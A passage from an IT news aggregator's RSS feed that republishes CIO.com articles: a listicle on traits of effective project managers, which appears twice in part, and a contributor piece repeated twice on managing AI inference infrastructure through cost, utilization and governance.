<p class="wp-block-paragraph">“Adaptability is huge,” says <a href="https://www.linkedin.com/in/krista-phillips-pmp-858aab98/">Krista Phillips</a>, a PMP holder and project management consultant. “Things are always going to change, priorities adjust, resources adjust, timelines change. Project managers must be able to successfully manage all that.”</p>



<h2 class="wp-block-heading">9. They are persuasive</h2>



<p class="wp-block-paragraph">Project managers typically manage teams but aren’t the boss of any of them, meaning they must be capable of leading and workers without having to lean on any official authority, explains <a href="https://www.linkedin.com/in/juliefbutcher/">Julie Butcher</a>, a fractional CIO work and transformation principal consultant with Butte Information Group. The best project managers are masters of this skill.</p>



<h2 class="wp-block-heading">10. They have ‘extreme awareness’</h2>



<p class="wp-block-paragraph"><a href="https://www.infotech.com/profiles/barry-cousins">Barry Cousins</a>, a distinguished analyst and research fellow specializing in project portfolio management, project management, and organizational change management at Info-Tech Research Group, says top project managers possess what he calls “extreme awareness of resource capacity and utilization.”</p>



<p class="wp-block-paragraph">“Savvy project managers in the modern era have immediate implicit awareness of the capacity around them, so then they’re going to know right off the bat when their projects are going to fall short,” Cousin adds. Furthermore, they’re more comfortable alerting business leaders to that situation because they’re able to quantify the shortfall.</p>



<p class="wp-block-paragraph">Others agree, saying this all speaks to the need for project managers to have strong emotional intelligence.</p>



<h2 class="wp-block-heading">11. They have highly tuned stakeholder management skills</h2>



<p class="wp-block-paragraph">Project managers work with numerous stakeholders from various departments within and outside their organizations, and those who manage those relationships best understand each stakeholder’s perspectives, say <a href="https://www.linkedin.com/in/te-wu/">Te Wu</a>, CEO and chief project officer at PMO Advisory.</p>



<p class="wp-block-paragraph">Wu adds that stakeholders can now also include AI agents.</p>



<p class="wp-block-paragraph">For example, some stakeholders may be more risk adverse than others, or more resistant to change, or more prone to panic when problems arise.</p>



<p class="wp-block-paragraph">Veteran project leaders say managers who can identify and empathize with those perspectives can tailor their communications, plans, and training to address each stakeholder’s unique points of view.</p>



<h2 class="wp-block-heading">12. They understand who has authority</h2>



<p class="wp-block-paragraph">Organizations today have distributed authority, so project managers must know who has say over what pieces — whether they’re dealing with 10 IT architects who each control a piece of the IT environment or 10 executives who have responsibilities for separate areas of the enterprise impacted by a project.</p>



<p class="wp-block-paragraph">“The savvy project manager knows to give them all room to succeed,” Cousins explains. That means staying on top of what each person’s realm of authority needs for the project to succeed, identifying who has ownership for what pieces, and knowing which person has true authority and can get others to line up behind him or her.</p>



<p class="wp-block-paragraph">“It often requires getting to know people who are at a layer of the company that you don’t play in,” Cousins says.</p>



<h2 class="wp-block-heading">13. They can navigate office politics</h2>



<p class="wp-block-paragraph">In addition to being good at stakeholder management, elite project managers also know how to navigate office politics. That means navigating not only individual stakeholder’s needs and expectations but also understanding how those stakeholders interact with each other, who has influence over the others, and who has power to override the authority of others.</p>



<p class="wp-block-paragraph">“They know when to apply what type of pressure to get something accomplished,” Wu adds.</p>



<h2 class="wp-block-heading">14. They’re decisive</h2>



<p class="wp-block-paragraph">Given the speed, complexity and fluidity of project work today, project managers must be critical thinkers and decisive decision-makers. Otherwise, they risk falling into analysis-paralysis and bringing work to a halt.</p>



<p class="wp-block-paragraph"><a href="https://www.linkedin.com/in/varunbijlani/">Varun Bijlani</a>, global managing partner for solutions and delivery at IBM Consulting, says the best project managers can confidently and consistently make good calls even in the face of ambiguity.</p>



<p class="wp-block-paragraph">“IT projects are rife with it, even though everyone walks in expecting full clarity and specificity: requirements shift, priorities compete, expectations are unclear, unplanned technical issues arise,” he says. “AI can surface options and synthesize information fast, but it can’t apply the contextual judgment, reasoning, and organizational awareness needed to weigh trade-offs and commit to a direction when the path isn’t clear. That’s still a human call.”</p>



<h2 class="wp-block-heading">15. They communicate effectively</h2>



<p class="wp-block-paragraph">Considering communication plays a significant role in <a href="https://www.cio.com/article/196244/stakeholder-management-your-plan-for-influencing-project-outcomes.html">managing projects, teams, and other stakeholders</a>, it is one of the essential skills for effective project managers, according to longtime project managers.</p>



<p class="wp-block-paragraph">Communication doesn’t just mean being a stellar facilitator, speaker, or writer; it requires good listening skills, too. As such, top managers actively listen to what’s said — and not said — and can take context into account.</p>



<p class="wp-block-paragraph">These skills enable project managers to synthesize information and then clearly and concisely sharing that information back with all those involved, Pincot explains.</p>



<p class="wp-block-paragraph">“They have to be able to translate business needs to technology teams and explain how technology creates value for the business so that everyone can understand and trust that information,” she adds.</p>



<h2 class="wp-block-heading">16. They build community</h2>



<p class="wp-block-paragraph">“I believe the ‘P’ in PM is for the people: You can’t do a project without a team. And the team might not report to the project manager, so you have to have collaborative leadership, problem-solving, and communication skills to activate your team. Without that you can’t really move the needle,” Eidem says. “But in a project, you’re working with people who might have different priorities and different understanding of the goals of the project, so it’s the project manager’s responsibility to make sure everyone is aligned and knows where they’re going.”</p>



<p class="wp-block-paragraph">Butcher agrees, saying that the best project managers know how to build a sense of community among the teams as well as with the workers on the periphery of projects so that everyone is willing to work toward a shared objective.</p>



<h2 class="wp-block-heading">17. They build rapport</h2>



<p class="wp-block-paragraph">Top project managers are also skilled at developing strong rapport with those around them — even for short-lived projects — knowing that good connections and solid relationships lead to success.</p>



<p class="wp-block-paragraph">“When you build rapport, there’s a shared understanding,” Phillips says. That shared understanding pays dividends. Project managers who take time to build up relationships are more likely to have others share information that could impact their projects, and they’re more likely to get help from others if they make difficult requests — such as staying late or coming in on a weekend to catch up.</p>



<h2 class="wp-block-heading">18. They’re confident leaders</h2>



<p class="wp-block-paragraph">According to Wu, effective project managers must possess confidence.</p>



<p class="wp-block-paragraph">“They have a can-do attitude, and that attitude needs to be a bit infectious,” he says. “They don’t have the be cheerleaders, but they do have to have a mindset that sees what’s possible and not just the issues and what’s at risk.”</p>



<p class="wp-block-paragraph">That allows them to present an optimistic attitude that can propel teams forward even during difficult stretches, Butcher adds. Project managers who possess such confidence are those with a track record of success and are competent in foundational project management skills such as planning and team-building, she says.</p>



<h2 class="wp-block-heading">19. They serve as change agents</h2>



<p class="wp-block-paragraph">Change is inevitable and can be highly disruptive to all areas of business and personal life; project management is no exception. Highly effective project managers understand this, embrace it, and build elements of uncertainty into their project plans. They also recognize the need to work closely with change management experts to help stakeholders adapt to change and better prepare for the future state of things.</p>



<h2 class="wp-block-heading">20. They possess an even-keeled demeanor</h2>



<p class="wp-block-paragraph">Even well-planned projects run into problems, and even highly skilled project managers can hit significant setbacks. But the best project managers don’t display panic, anger, or despair even under pressure; they keep their cool.</p>



<p class="wp-block-paragraph">“Projects can create a lot of pressure, and there can be seemingly conflicting priorities, so staying calm is an essential trait for project managers,” Pincot says.</p>



<p class="wp-block-paragraph"><strong>More on project management:</strong></p>



<ul class="wp-block-list">
<li><a href="https://www.cio.com/article/244577/top-project-management-methodologies.html">Top 20 project management methodologies</a></li>



<li><a href="https://www.cio.com/article/228109/project-management-tips-strategies-best-practices.html">Project management guide: Tips, strategies, best practices</a></li>



<li><a href="https://www.cio.com/article/230682/what-is-a-project-manager-the-lead-role-for-project-success.html">What is a project manager? The lead role for project success</a></li>



<li><a href="https://www.cio.com/article/230398/top-project-management-certifications.html">Top 15 project management certifications</a></li>



<li><a href="https://www.cio.com/article/286354/project-management-7-must-have-project-management-skills-for-it-pros.html">7 must-have project management skills</a></li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why AI infrastructure needs a new operating model]]></title>
<description><![CDATA[The next AI infrastructure crisis may come from unmanaged inference capacity. For the past several years, the AI infrastructure conversation centered on one question: how do we get more compute?



That made sense. Enterprises needed GPUs, cloud capacity, foundation models and room to experiment....]]></description>
<link>https://tsecurity.de/de/3702874/it-nachrichten/why-ai-infrastructure-needs-a-new-operating-model/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3702874/it-nachrichten/why-ai-infrastructure-needs-a-new-operating-model/</guid>
<pubDate>Tue, 04 Aug 2026 12:16:11 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The next AI infrastructure crisis may come from unmanaged inference capacity. For the past several years, the AI infrastructure conversation centered on one question: how do we get more compute?</p>



<p class="wp-block-paragraph">That made sense. Enterprises needed GPUs, cloud capacity, foundation models and room to experiment. Compute became shorthand for AI readiness.</p>



<p class="wp-block-paragraph"><a href="https://www.cio.com/article/4112793/how-ai-is-reshaping-the-foundations-of-computing-and-storage.html">Production AI changes the operating discussion</a>. Utilization, routing, latency, throughput, cost control, policy, privacy and governance now need to be managed together. A GPU that sits idle creates no business value. A model endpoint with unpredictable latency frustrates users. An inference stack that cannot be measured end-to-end becomes difficult to defend when usage grows and finance asks where the money is going.</p>



<p class="wp-block-paragraph">CIOs need governed capacity.</p>



<p class="wp-block-paragraph">Governed capacity means operating AI infrastructure as a production system rather than a collection of disconnected resources. They need to know how much useful output their infrastructure produces, where that output runs, why it runs there, what it costs, how it performs, what policy applies and whether the system can be controlled as demand changes.</p>



<p class="wp-block-paragraph">Enterprises buy AI infrastructure to deliver answers, summaries, recommendations, software code, customer interactions, analysis, automation and agent workflows. Those outputs need to be reliable, measurable and affordable enough to keep running.</p>



<h2 class="wp-block-heading">The pilot-era stack is reaching its limit</h2>



<p class="wp-block-paragraph">The first wave of enterprise AI rewarded speed. Teams bought GPUs, reserved cloud capacity, tested APIs, adopted open-source models and assembled whatever stack helped them move.</p>



<p class="wp-block-paragraph">Infrastructure inefficiency then becomes a business issue.</p>



<p class="wp-block-paragraph">The symptoms are familiar: more systems to manage, more vendors to coordinate, more integration work and less visibility into what drives cost and performance.</p>



<p class="wp-block-paragraph">That creates friction across the organization. IT teams support AI workloads that behave differently from traditional enterprise applications. AI teams need speed, but often lack the infrastructure control to tune cost, latency, utilization and performance together. Finance teams want predictable unit economics, but the stack was assembled under pressure and is hard to measure end to end.</p>



<p class="wp-block-paragraph">Most teams can now get access to models and compute. Fewer can show how each workload is performing, where it runs and what it costs.</p>



<h2 class="wp-block-heading">Capacity needs control</h2>



<p class="wp-block-paragraph">Extra capacity can still leave teams with idle infrastructure, uneven latency and unclear unit costs.</p>



<p class="wp-block-paragraph">The useful questions are operational. Can the organization see utilization across teams, tenants, models and infrastructure pools? Can it route workloads based on cost, latency, privacy, availability and service objectives? Can it measure cost per token, cost per inference, cost per user interaction or cost per business workflow?</p>



<p class="wp-block-paragraph">Inference behavior changes constantly. Demand fluctuates. Longer contexts increase cost. Model choice affects latency and output quality. Utilization varies across workloads. A customer-facing assistant may prioritize response time. A batch workflow may prioritize throughput and cost.</p>



<p class="wp-block-paragraph">A procurement-led AI strategy cannot manage that complexity on its own. CIOs need an operating model for production inference.</p>



<p class="wp-block-paragraph"><a href="https://www.cio.com/article/274774/infrastructure-seven-financial-reasons-to-use-linux-in-the-enterprise.html">Enterprise Linux</a> offers a useful analogy. Linux gave companies flexibility and attractive economics, but enterprises needed a trusted operating layer and support model before using it for business-critical systems. AI infrastructure is reaching a similar stage. The models, hardware and software components already exist. Many organizations now need a way to operate them consistently and economically in production.</p>



<h2 class="wp-block-heading">Token economics is becoming a management discipline</h2>



<p class="wp-block-paragraph">The useful output of many AI systems is delivered through tokens. That makes <a href="https://www.cio.com/article/4184596/tokenomics-in-enterprise-ai.html">token economics</a> a practical operating metric.</p>



<p class="wp-block-paragraph">Token volume needs context. A token that helps complete a task, answer a question or resolve a customer issue creates value. A token generated through poor routing, excess latency or an unnecessarily expensive model adds cost without improving the outcome.</p>



<p class="wp-block-paragraph">How much useful output are we getting per dollar? How much per watt? How much per GPU? How much per workload? How much per unit of latency? How much per business outcome?</p>



<p class="wp-block-paragraph">Manufacturing leaders do not only ask how many machines they own. They ask what those machines produce, how often they sit idle, how much waste they create, how much energy they consume and how efficiently raw materials become finished goods.</p>



<p class="wp-block-paragraph">AI infrastructure needs the same operating discipline: utilization, throughput, reliability, cost control and visibility into what the infrastructure is producing.</p>



<h2 class="wp-block-heading">Enterprises need usability and control</h2>



<p class="wp-block-paragraph">Serverless AI APIs are fast to start and easy for developers. They work well for many use cases. As usage grows, economics can become harder to control and visibility into infrastructure behavior is limited.</p>



<p class="wp-block-paragraph">Self-managed infrastructure gives teams more control and can improve long-term economics for persistent workloads. It also adds operational burden. Teams have to manage deployment, scaling, routing, model serving, monitoring, reliability, performance tuning, security, isolation and utilization.</p>



<p class="wp-block-paragraph">Enterprises want the simplicity of managed services without giving up visibility and control. Developers should be able to access AI services without managing the underlying stack. Infrastructure, security and finance teams still need to see placement, cost, latency, utilization, tenant policy, service levels and risk.</p>



<p class="wp-block-paragraph">That is the role of an inference operating layer: turning fragmented infrastructure into governed, measurable capacity that teams can manage as demand changes.</p>



<h2 class="wp-block-heading">Beyond procurement</h2>



<p class="wp-block-paragraph">The more successful an AI application becomes, the more inference it consumes. As inference grows, cost, latency, utilization and governance determine whether the application can scale.</p>



<p class="wp-block-paragraph">AI can repeat the cloud-cost pattern many CIOs already know. A service begins as an innovation accelerator, usage expands across teams and the bill grows faster than governance. By the time the organization tries to regain control, the architecture, workflows and vendor dependencies are difficult to unwind.</p>



<p class="wp-block-paragraph">GPUs remain essential. Models remain essential. Data remains essential. Production AI also needs an operating layer around those assets.</p>



<p class="wp-block-paragraph">The next generation of AI leaders will ask a harder question:</p>



<p class="wp-block-paragraph">How much useful intelligence can we produce from our infrastructure, at what cost, with what reliability, under what policy and under whose control?</p>



<p class="wp-block-paragraph">The answer will determine whether AI becomes a controlled production capability or another expensive system the business struggles to explain.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why AI infrastructure needs a new operating model]]></title>
<description><![CDATA[The next AI infrastructure crisis may come from unmanaged inference capacity. For the past several years, the AI infrastructure conversation centered on one question: how do we get more compute?



That made sense. Enterprises needed GPUs, cloud capacity, foundation models and room to experiment....]]></description>
<link>https://tsecurity.de/de/3702816/it-security-nachrichten/why-ai-infrastructure-needs-a-new-operating-model/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3702816/it-security-nachrichten/why-ai-infrastructure-needs-a-new-operating-model/</guid>
<pubDate>Tue, 04 Aug 2026 12:06:23 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The next AI infrastructure crisis may come from unmanaged inference capacity. For the past several years, the AI infrastructure conversation centered on one question: how do we get more compute?</p>



<p class="wp-block-paragraph">That made sense. Enterprises needed GPUs, cloud capacity, foundation models and room to experiment. Compute became shorthand for AI readiness.</p>



<p class="wp-block-paragraph"><a href="https://www.cio.com/article/4112793/how-ai-is-reshaping-the-foundations-of-computing-and-storage.html">Production AI changes the operating discussion</a>. Utilization, routing, latency, throughput, cost control, policy, privacy and governance now need to be managed together. A GPU that sits idle creates no business value. A model endpoint with unpredictable latency frustrates users. An inference stack that cannot be measured end-to-end becomes difficult to defend when usage grows and finance asks where the money is going.</p>



<p class="wp-block-paragraph">CIOs need governed capacity.</p>



<p class="wp-block-paragraph">Governed capacity means operating AI infrastructure as a production system rather than a collection of disconnected resources. They need to know how much useful output their infrastructure produces, where that output runs, why it runs there, what it costs, how it performs, what policy applies and whether the system can be controlled as demand changes.</p>



<p class="wp-block-paragraph">Enterprises buy AI infrastructure to deliver answers, summaries, recommendations, software code, customer interactions, analysis, automation and agent workflows. Those outputs need to be reliable, measurable and affordable enough to keep running.</p>



<h2 class="wp-block-heading">The pilot-era stack is reaching its limit</h2>



<p class="wp-block-paragraph">The first wave of enterprise AI rewarded speed. Teams bought GPUs, reserved cloud capacity, tested APIs, adopted open-source models and assembled whatever stack helped them move.</p>



<p class="wp-block-paragraph">Infrastructure inefficiency then becomes a business issue.</p>



<p class="wp-block-paragraph">The symptoms are familiar: more systems to manage, more vendors to coordinate, more integration work and less visibility into what drives cost and performance.</p>



<p class="wp-block-paragraph">That creates friction across the organization. IT teams support AI workloads that behave differently from traditional enterprise applications. AI teams need speed, but often lack the infrastructure control to tune cost, latency, utilization and performance together. Finance teams want predictable unit economics, but the stack was assembled under pressure and is hard to measure end to end.</p>



<p class="wp-block-paragraph">Most teams can now get access to models and compute. Fewer can show how each workload is performing, where it runs and what it costs.</p>



<h2 class="wp-block-heading">Capacity needs control</h2>



<p class="wp-block-paragraph">Extra capacity can still leave teams with idle infrastructure, uneven latency and unclear unit costs.</p>



<p class="wp-block-paragraph">The useful questions are operational. Can the organization see utilization across teams, tenants, models and infrastructure pools? Can it route workloads based on cost, latency, privacy, availability and service objectives? Can it measure cost per token, cost per inference, cost per user interaction or cost per business workflow?</p>



<p class="wp-block-paragraph">Inference behavior changes constantly. Demand fluctuates. Longer contexts increase cost. Model choice affects latency and output quality. Utilization varies across workloads. A customer-facing assistant may prioritize response time. A batch workflow may prioritize throughput and cost.</p>



<p class="wp-block-paragraph">A procurement-led AI strategy cannot manage that complexity on its own. CIOs need an operating model for production inference.</p>



<p class="wp-block-paragraph"><a href="https://www.cio.com/article/274774/infrastructure-seven-financial-reasons-to-use-linux-in-the-enterprise.html">Enterprise Linux</a> offers a useful analogy. Linux gave companies flexibility and attractive economics, but enterprises needed a trusted operating layer and support model before using it for business-critical systems. AI infrastructure is reaching a similar stage. The models, hardware and software components already exist. Many organizations now need a way to operate them consistently and economically in production.</p>



<h2 class="wp-block-heading">Token economics is becoming a management discipline</h2>



<p class="wp-block-paragraph">The useful output of many AI systems is delivered through tokens. That makes <a href="https://www.cio.com/article/4184596/tokenomics-in-enterprise-ai.html">token economics</a> a practical operating metric.</p>



<p class="wp-block-paragraph">Token volume needs context. A token that helps complete a task, answer a question or resolve a customer issue creates value. A token generated through poor routing, excess latency or an unnecessarily expensive model adds cost without improving the outcome.</p>



<p class="wp-block-paragraph">How much useful output are we getting per dollar? How much per watt? How much per GPU? How much per workload? How much per unit of latency? How much per business outcome?</p>



<p class="wp-block-paragraph">Manufacturing leaders do not only ask how many machines they own. They ask what those machines produce, how often they sit idle, how much waste they create, how much energy they consume and how efficiently raw materials become finished goods.</p>



<p class="wp-block-paragraph">AI infrastructure needs the same operating discipline: utilization, throughput, reliability, cost control and visibility into what the infrastructure is producing.</p>



<h2 class="wp-block-heading">Enterprises need usability and control</h2>



<p class="wp-block-paragraph">Serverless AI APIs are fast to start and easy for developers. They work well for many use cases. As usage grows, economics can become harder to control and visibility into infrastructure behavior is limited.</p>



<p class="wp-block-paragraph">Self-managed infrastructure gives teams more control and can improve long-term economics for persistent workloads. It also adds operational burden. Teams have to manage deployment, scaling, routing, model serving, monitoring, reliability, performance tuning, security, isolation and utilization.</p>



<p class="wp-block-paragraph">Enterprises want the simplicity of managed services without giving up visibility and control. Developers should be able to access AI services without managing the underlying stack. Infrastructure, security and finance teams still need to see placement, cost, latency, utilization, tenant policy, service levels and risk.</p>



<p class="wp-block-paragraph">That is the role of an inference operating layer: turning fragmented infrastructure into governed, measurable capacity that teams can manage as demand changes.</p>



<h2 class="wp-block-heading">Beyond procurement</h2>



<p class="wp-block-paragraph">The more successful an AI application becomes, the more inference it consumes. As inference grows, cost, latency, utilization and governance determine whether the application can scale.</p>



<p class="wp-block-paragraph">AI can repeat the cloud-cost pattern many CIOs already know. A service begins as an innovation accelerator, usage expands across teams and the bill grows faster than governance. By the time the organization tries to regain control, the architecture, workflows and vendor dependencies are difficult to unwind.</p>



<p class="wp-block-paragraph">GPUs remain essential. Models remain essential. Data remains essential. Production AI also needs an operating layer around those assets.</p>



<p class="wp-block-paragraph">The next generation of AI leaders will ask a harder question:</p>



<p class="wp-block-paragraph">How much useful intelligence can we produce from our infrastructure, at what cost, with what reliability, under what policy and under whose control?</p>



<p class="wp-block-paragraph">The answer will determine whether AI becomes a controlled production capability or another expensive system the business struggles to explain.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[20 traits of innovative and invaluable project managers]]></title>
<description><![CDATA[Projects are becoming more complex, with higher stakes and faster delivery times.



At the same time automation and AI are changing how projects are designed, managed, and delivered. Indeed, some pieces of project management are now routinely handled by machines.



Some may think that AI and au...]]></description>
<link>https://tsecurity.de/de/3702815/it-security-nachrichten/20-traits-of-innovative-and-invaluable-project-managers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3702815/it-security-nachrichten/20-traits-of-innovative-and-invaluable-project-managers/</guid>
<pubDate>Tue, 04 Aug 2026 12:05:56 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Projects are becoming more complex, with higher stakes and faster delivery times.</p>



<p class="wp-block-paragraph">At the same time automation and AI are changing how projects are designed, managed, and delivered. Indeed, some pieces of project management are now routinely handled by machines.</p>



<p class="wp-block-paragraph">Some may think that AI and automation will make project managers obsolete, or at least less critical to project success. Executives say that’s not the case. Project managers are as important now as they ever were to project success.</p>



<p class="wp-block-paragraph">“As we move forward, the role of project manager is actually becoming increasingly important for finding the right things to invest in, defining scope, and staying focused on value,” says <a href="https://www.linkedin.com/in/noah-fletcher-9012ba4/">Noah Fletcher</a>, a partner in the operations excellence practice at consultancy West Monroe. “As we continue to accelerate, their value is really about quality — quality of what you’re trying to accomplish.”</p>



<p class="wp-block-paragraph">That doesn’t mean that the role of project manager is static. Rather, the role is evolving, with what it takes to be successful is changing to meet the needs of the moment.</p>



<p class="wp-block-paragraph">To thrive, project managers need to hone a complex combination of technical, business, and interpersonal skills. The Project Management Institute attempts to decode what it takes to be a successful project manager with its <a href="https://www.pmi.org/learning/training-development/talent-triangle">PMI Talent Triangle</a>, comprising Ways of Working, Power Skills, and Business Acumen.</p>



<p class="wp-block-paragraph">Not surprisingly, there’s a lot packed into those three areas. Effective project managers must know how to define <a href="https://www.cio.com/article/193441/what-is-project-scope-defining-and-outlining-project-success.html">the scope of a project</a>, identify necessary resources, and schedule those resources — all part of the technical aspect of the job. They must also <a href="https://www.cio.com/article/196244/stakeholder-management-your-plan-for-influencing-project-outcomes.html">manage stakeholders</a> and ensure projects align with business goals — skills that fall under the other two talent buckets.</p>



<p class="wp-block-paragraph">As lengthy as the PMI’s list of required skills is, experienced project leaders say that’s not enough to rise to the top of the profession; highly effective project managers today bring even more to their jobs.</p>



<p class="wp-block-paragraph">They’re curious, flexible, and adaptive — and they learn from and know how to right their mistakes. They’re empathetic, persuasive, and visionary. They know how to play to their own and others’ strengths.</p>



<p class="wp-block-paragraph">Leading project professionals say the most successful PMs are those who know the academic parts of the job — that is, the elements that are taught — but they also bring finesse to the work.</p>



<p class="wp-block-paragraph">So, what characteristics distinguish the most effective project managers? Longtime project leaders list the following key traits and skills as vital to succeeding at a high level.</p>



<h2 class="wp-block-heading">1. They serve as a strategic business partner</h2>



<p class="wp-block-paragraph">Top-level project managers are more than good managers. They have high-level strategic leadership skills and know how their projects fit within overall strategic goals, making them well equipped to make the right decisions for the project and the organization as a whole.</p>



<p class="wp-block-paragraph">“A project exists because it responds to a need of the business. That might be due to trends impacting the business or a challenge in running the business, but without understanding that, it will be hard for the project manager to deliver a successful project,” says <a href="https://www.pmi.org/about/leadership-governance/karla-eidem">Karla Eidem</a>, a Project Management Professional (PMP) and PMI’s global head of transformation and project delivery.</p>



<h2 class="wp-block-heading">2. They know the business</h2>



<p class="wp-block-paragraph">The most effective project managers aren’t just great leaders; they’re also business-savvy.</p>



<p class="wp-block-paragraph">“They understand strategy and business context,” Fletcher says. As they deal with shifting resources and changing market dynamics that happen during many projects, they focus on what work will bring business value — not merely what will tick off items on a task list. “That ability to work on the right thing is one of the most important things that a project manager can have,” Fletcher adds.</p>



<h2 class="wp-block-heading">3. They’re strong technologists</h2>



<p class="wp-block-paragraph">Projects today nearly always involve technology, making it essential to have technology skills. But standout project managers are true technologists, too.</p>



<p class="wp-block-paragraph">“Increasingly IT is touching so many different area, and we’re seeing systems and architecture getting more connected, so understanding how business and operations fit together is critical,” Fletcher says.</p>



<h2 class="wp-block-heading">4. They’re financially astute</h2>



<p class="wp-block-paragraph">Project management always involved budget management, but the task today requires more than balancing the books. It also involves understanding how projects and the core components of any given initiative bring value to the business. That takes financial acumen and the ability to make smart decisions during project execution to ensure the business sees returns on its investment.</p>



<p class="wp-block-paragraph">“The best project managers know the business drivers and can get depth on how the project impacts the business financially,” Fletcher says. “They have a good value management framework, that end-to-end process that can take the business case all the way through.”</p>



<h2 class="wp-block-heading">5. They possess extraordinary organizational skills</h2>



<p class="wp-block-paragraph">Top-notch project managers are highly organized individuals. But it’s not just about making a list and sticking with it. They understand how project plans and resources are intertwined with other goings-on within the organization. That organizational capacity enables them to adjust their plans and resources when needed.</p>



<p class="wp-block-paragraph"><a href="https://www.pmi.org/about/leadership-governance/lenka-pincot">Lenka Pincot</a>, chief of staff to the CEO at PMI, says today’s top-notch project managers are “orchestrators” who can pull together the complex components of modern projects and get them to work in harmony.</p>



<p class="wp-block-paragraph">“Organizations need orchestrators who can synchronize all the changes happening so the results all make sense,” she says. She notes that orchestration takes systems thinking as well as the ability to identify and plan for unintended consequences.</p>



<h2 class="wp-block-heading">6. They’re problem-solvers</h2>



<p class="wp-block-paragraph">The best project managers are good at delving into and solving for the “why” behind projects.</p>



<p class="wp-block-paragraph">“They enjoy problem-solving,” Pincot says. “[As project managers], we’re not handed projects; we are handed problems to solve. So we need to get to the bottom of what’s not working. We need to ask questions and really listen for what someone’s true interests are.”</p>



<h2 class="wp-block-heading">7. They thrive in fast-paced environments</h2>



<p class="wp-block-paragraph">Executives constantly talk about the speed of change today. Teams must work fast to keep up with shifting technology and business contexts, and project managers must be able to facilitate that, Fletcher says.</p>



<p class="wp-block-paragraph">“The ability to quickly identify the right tools, assign the right resources, accelerate testing, and to move things forward fast without compromising quality is a huge thing today,” he adds.</p>



<h2 class="wp-block-heading">8. They are flexible</h2>



<p class="wp-block-paragraph">Similarly, highly effective project managers are flexible, so they themselves aren’t flummoxed when project plans need adjustments — something that happens increasingly more often in the modern digital world.</p>



<p class="wp-block-paragraph">“Adaptability is huge,” says <a href="https://www.linkedin.com/in/krista-phillips-pmp-858aab98/">Krista Phillips</a>, a PMP holder and project management consultant. “Things are always going to change, priorities adjust, resources adjust, timelines change. Project managers must be able to successfully manage all that.”</p>



<h2 class="wp-block-heading">9. They are persuasive</h2>



<p class="wp-block-paragraph">Project managers typically manage teams but aren’t the boss of any of them, meaning they must be capable of leading and workers without having to lean on any official authority, explains <a href="https://www.linkedin.com/in/juliefbutcher/">Julie Butcher</a>, a fractional CIO work and transformation principal consultant with Butte Information Group. The best project managers are masters of this skill.</p>



<h2 class="wp-block-heading">10. They have ‘extreme awareness’</h2>



<p class="wp-block-paragraph"><a href="https://www.infotech.com/profiles/barry-cousins">Barry Cousins</a>, a distinguished analyst and research fellow specializing in project portfolio management, project management, and organizational change management at Info-Tech Research Group, says top project managers possess what he calls “extreme awareness of resource capacity and utilization.”</p>



<p class="wp-block-paragraph">“Savvy project managers in the modern era have immediate implicit awareness of the capacity around them, so then they’re going to know right off the bat when their projects are going to fall short,” Cousin adds. Furthermore, they’re more comfortable alerting business leaders to that situation because they’re able to quantify the shortfall.</p>



<p class="wp-block-paragraph">Others agree, saying this all speaks to the need for project managers to have strong emotional intelligence.</p>



<h2 class="wp-block-heading">11. They have highly tuned stakeholder management skills</h2>



<p class="wp-block-paragraph">Project managers work with numerous stakeholders from various departments within and outside their organizations, and those who manage those relationships best understand each stakeholder’s perspectives, say <a href="https://www.linkedin.com/in/te-wu/">Te Wu</a>, CEO and chief project officer at PMO Advisory.</p>



<p class="wp-block-paragraph">Wu adds that stakeholders can now also include AI agents.</p>



<p class="wp-block-paragraph">For example, some stakeholders may be more risk adverse than others, or more resistant to change, or more prone to panic when problems arise.</p>



<p class="wp-block-paragraph">Veteran project leaders say managers who can identify and empathize with those perspectives can tailor their communications, plans, and training to address each stakeholder’s unique points of view.</p>



<h2 class="wp-block-heading">12. They understand who has authority</h2>



<p class="wp-block-paragraph">Organizations today have distributed authority, so project managers must know who has say over what pieces — whether they’re dealing with 10 IT architects who each control a piece of the IT environment or 10 executives who have responsibilities for separate areas of the enterprise impacted by a project.</p>



<p class="wp-block-paragraph">“The savvy project manager knows to give them all room to succeed,” Cousins explains. That means staying on top of what each person’s realm of authority needs for the project to succeed, identifying who has ownership for what pieces, and knowing which person has true authority and can get others to line up behind him or her.</p>



<p class="wp-block-paragraph">“It often requires getting to know people who are at a layer of the company that you don’t play in,” Cousins says.</p>



<h2 class="wp-block-heading">13. They can navigate office politics</h2>



<p class="wp-block-paragraph">In addition to being good at stakeholder management, elite project managers also know how to navigate office politics. That means navigating not only individual stakeholder’s needs and expectations but also understanding how those stakeholders interact with each other, who has influence over the others, and who has power to override the authority of others.</p>



<p class="wp-block-paragraph">“They know when to apply what type of pressure to get something accomplished,” Wu adds.</p>



<h2 class="wp-block-heading">14. They’re decisive</h2>



<p class="wp-block-paragraph">Given the speed, complexity and fluidity of project work today, project managers must be critical thinkers and decisive decision-makers. Otherwise, they risk falling into analysis-paralysis and bringing work to a halt.</p>



